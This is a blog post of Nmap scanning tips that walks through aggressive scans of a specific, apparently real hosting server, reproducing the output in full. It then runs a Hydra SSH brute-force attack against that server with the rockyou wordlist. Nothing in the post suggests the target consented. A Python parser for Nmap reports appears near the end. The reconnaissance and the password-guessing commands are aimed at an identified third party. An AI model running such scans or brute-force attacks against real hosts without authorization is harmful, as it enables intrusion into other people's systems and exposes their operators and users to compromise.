Very useful Nmap scanning tips for getting information from a host.

Posted: July 20, 2017 at 11:47 AM. Post ID: 10962

The nmap -A -P0 command line will scan a host and report what is running on it: -A turns on OS detection, version detection, default script scanning and traceroute, and -P0 (spelled -Pn in current Nmap releases) skips host discovery, so the scan proceeds even if the host does not answer pings. Press j whilst the scan is running to print statistics about its progress; press it again to update them.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)

This is very useful when a scan is taking a very long time and you need feedback on how long it has left to run.

We are getting there slowly.

┌─[root@parrot][/home/user]
└──╼ #nmap -A -P0 202.146.215.17
 
Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-19 23:48 UTC
Stats: 0:01:56 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 34.67% done; ETC: 23:54 (0:03:37 remaining)
Stats: 0:05:26 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 43.46% done; ETC: 00:01 (0:07:04 remaining)
Stats: 0:07:02 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 47.70% done; ETC: 00:03 (0:07:43 remaining)
Stats: 0:07:40 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 49.39% done; ETC: 00:04 (0:07:50 remaining)
Stats: 0:11:04 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.17% done; ETC: 00:07 (0:07:57 remaining)
Stats: 0:11:11 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 58.49% done; ETC: 00:08 (0:07:56 remaining)

And we are done with our scan. This server has open SSH, FTP and HTTP ports…

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.048s latency).
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Subject Alternative Name: DNS:*.qnetau.com, DNS:qnetau.com
| Not valid before: 2013-02-11T00:00:00
|_Not valid after:  2018-02-10T23:59:59
|_ssl-date: TLS randomness does not represent time
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
Aggressive OS guesses: Linux 3.0 (96%), ProVision-ISR security DVR (95%), Linux 2.6.32 (95%), OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (93%), OpenWrt White Russian 0.9 (Linux 2.4.30) (93%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (93%), HP P2000 G3 NAS device (93%), Linux 2.6.32 - 3.10 (93%), HIKVISION DS-7600 Linux Embedded NVR (Linux 2.6.10) (93%), DD-WRT v24-sp2 (Linux 3.10) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 6 hops
 
TRACEROUTE (using port 49163/tcp)
HOP RTT      ADDRESS
1   4.70 ms  dsldevice.lan (10.1.1.1)
2   45.69 ms masceqx-lns14.syd.nsw.m2core.net.au (122.148.3.99)
3   44.06 ms 241.02.static.syd.iprimus.net.au (203.134.3.241)
4   52.04 ms 24469.syd.equinix.com (45.127.172.29)
5   50.86 ms ar1.syd1.quadrahosting.com.au (202.146.208.1)
6   41.73 ms nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1862.27 seconds

Now I can scan the SSH port on the remote server. Use the -s parameter to specify the SSH port if it is not port 22.

Using this command line: hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh.

┌─[root@parrot][/home/user]
└──╼ #hydra -l admin -s 8022 -P rockyou.txt 202.146.215.17 -t 4 ssh
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2017-07-20 00:30:41
[DATA] max 4 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~56032 tries per task
[DATA] attacking service ssh on port 8022
[STATUS] 17.00 tries/min, 17 tries in 00:01h, 14344385 to do in 14063:08h, 4 active
[STATUS] 13.67 tries/min, 41 tries in 00:03h, 14344385 to do in 17493:10h, 4 active
[STATUS] 12.71 tries/min, 89 tries in 00:07h, 14344385 to do in 18803:31h, 4 active
[STATUS] 12.27 tries/min, 184 tries in 00:15h, 14344344 to do in 19489:36h, 4 active

I had a lot of problems with this approach as the server has some protection against SSH brute force, but there is also an open FTP port.

But now I am trying to get more information about the server. Using this command line: nmap -A -P0 -sX 202.146.215.17.

root@[host]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC

And as before, I can press j to get feedback about the progress of the scan.

root@[host]:~# nmap -A -P0 -sX 202.146.215.17
 
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-20 01:40 UTC
Stats: 0:03:41 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 6.70% done; ETC: 01:49 (0:04:39 remaining)
Stats: 0:04:23 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 24.50% done; ETC: 01:48 (0:03:11 remaining)

Now I get the full output of the Nmap scan of the target host. Note the "997 open|filtered ports" line: a Xmas scan (-sX) cannot tell an open port from a filtered one, which is also why Nmap warns that the OS detection results may be unreliable, since it could not find both an open and a closed port.

Nmap scan report for nix17.qnetau.com (202.146.215.17)
Host is up (0.0029s latency).
Not shown: 997 open|filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
443/tcp  open  ssl/http Apache httpd
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Quadra Hosting Server
| ssl-cert: Subject: commonName=*.qnetau.com
| Not valid before: 2013-02-11T00:00:00+00:00
|_Not valid after:  2018-02-10T23:59:59+00:00
|_ssl-date: 1985-01-15T10:30:54+00:00; -32y185d15h22m13s from local time.
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
|_ssh-hostkey: 1024 ec:50:36:e5:e4:11:49:42:d5:fb:b9:0a:b6:e9:1f:13 (DSA)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.18 - 2.6.22 (93%), Linux 3.2.0 (88%), OpenWrt Kamikaze 8.09 (Linux 2.6.25.20) (88%), Tomato 1.27 - 1.28 (Linux 2.4.20) (88%), IPCop 1.9.19 or IPFire firewall 2.9 (Linux 2.6.32) (87%), Netgear DG834G WAP or Western Digital WD TV media player (87%), Linux 3.2.1 (87%), Linux 3.2 (86%), OpenWrt White Russian 0.9 (Linux 2.4.30) (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 7 hops
 
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   1.06 ms  ec2-XX-XX-0-20.ap-southeast-2.compute.amazonaws.com (XX.XXX.0.20)
2   2.38 ms  XX.XXX.XXX.XXX
3   20.56 ms XX.XX.XX.XX
4   2.32 ms  XX.XX.XX.XX
5   2.46 ms  24469.syd.equinix.com (45.127.172.29)
6   3.27 ms  ar1.syd1.quadrahosting.com.au (202.146.208.1)
7   2.97 ms  nix17.qnetau.com (202.146.215.17)
 
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2223.22 seconds
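When these reports are collected regularly (an inventory or attack-surface check, rather than a one-off look), the normal output above is worth parsing rather than reading by eye. The following is an added example, not code from the original post or from the Nmap project: it pulls the port table and the ssl-cert expiry dates out of the -A report shown earlier, reads the "Not shown:" summary so that the -sX scan's open|filtered result is not mistaken for confirmed open ports, and flags certificates that are expired or close to it. The sample inputs are constructed excerpts of the two reports on this page; the function names and the 90-day default are my own assumptions.

```python
import re
from datetime import datetime

# Constructed sample: an excerpt of the nmap -A normal output shown on this page.
SAMPLE = """\
Nmap scan report for nix17.qnetau.com (202.146.215.17)
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
| ssl-cert: Subject: commonName=*.qnetau.com
|_Not valid after:  2018-02-10T23:59:59
80/tcp   open  http     Apache httpd
443/tcp  open  ssl/http Apache httpd
| ssl-cert: Subject: commonName=*.qnetau.com
|_Not valid after:  2018-02-10T23:59:59
|_ssl-date: TLS randomness does not represent time
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
"""
# Constructed sample: the summary line the -sX (Xmas) scan on this page produced.
SAMPLE_XMAS = "Not shown: 997 open|filtered ports\n8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)\n"

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
NOT_AFTER_RE = re.compile(r"^\|_?Not valid after:\s+(\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)")

def parse_report(text):
    """Map 'port/proto' -> fields; NSE script lines ('|' prefix) attach to the preceding port."""
    ports, current = {}, None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = ports[f"{m[1]}/{m[2]}"] = {
                "state": m[3], "service": m[4], "version": m[5].strip(), "cert_not_after": None}
        elif current is not None and (m := NOT_AFTER_RE.match(line)):
            current["cert_not_after"] = datetime.fromisoformat(m[1])
    return ports

def not_shown(text):
    """Counts of the port states nmap folded into 'Not shown:'. For a Xmas scan this is
    mostly 'open|filtered', because that scan type cannot tell the two states apart."""
    line = next((l for l in text.splitlines() if l.startswith("Not shown:")), "")
    return {state: int(n) for n, state in re.findall(r"(\d+) (\S+) ports", line)}

def confirmed_open(ports):
    """Only state 'open' counts as confirmed; 'open|filtered' does not."""
    return sorted((p for p, d in ports.items() if d["state"] == "open"),
                  key=lambda p: int(p.split("/")[0]))

def certs_expiring(ports, as_of, within_days=90):
    """Ports whose certificate is expired, or expires within `within_days` of `as_of` (ISO date)."""
    ref = datetime.fromisoformat(as_of)
    return sorted(p for p, d in ports.items()
                  if d["cert_not_after"] and (d["cert_not_after"] - ref).days < within_days)
```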

These Nmap tips should help out any budding penetration tester, and they are a good way to keep track of the progress of a scan that is taking a very long time to complete.
